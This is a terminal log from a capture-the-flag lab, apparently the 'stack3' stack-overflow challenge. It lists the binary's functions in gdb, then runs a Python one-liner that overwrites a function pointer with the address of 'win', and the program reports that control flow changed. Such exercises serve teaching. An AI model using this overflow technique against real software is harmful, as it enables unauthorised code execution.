```bash
ctf> gdb -q stack3
Reading symbols from stack3...(no debugging symbols found)...done.
(gdb) info functions
All defined functions:

Non-debugging symbols:
0x080482e8  _init
0x08048320  printf@plt
0x08048330  gets@plt
0x08048340  puts@plt
0x08048350  __libc_start_main@plt
0x08048370  _start
0x080483a0  __x86.get_pc_thunk.bx
0x080483b0  deregister_tm_clones
0x080483e0  register_tm_clones
0x08048420  __do_global_dtors_aux
0x08048440  frame_dummy
0x0804846b  win
0x08048484  main
0x080484e0  __libc_csu_init
0x08048540  __libc_csu_fini
0x08048544  _fini
(gdb) quit
ctf> python -c 'print "A"*64 + "\x6b\x84\x04\x08"' | ./stack3 
calling function pointer, jumping to 0x0804846b
code flow successfully changed
ctf> 
```
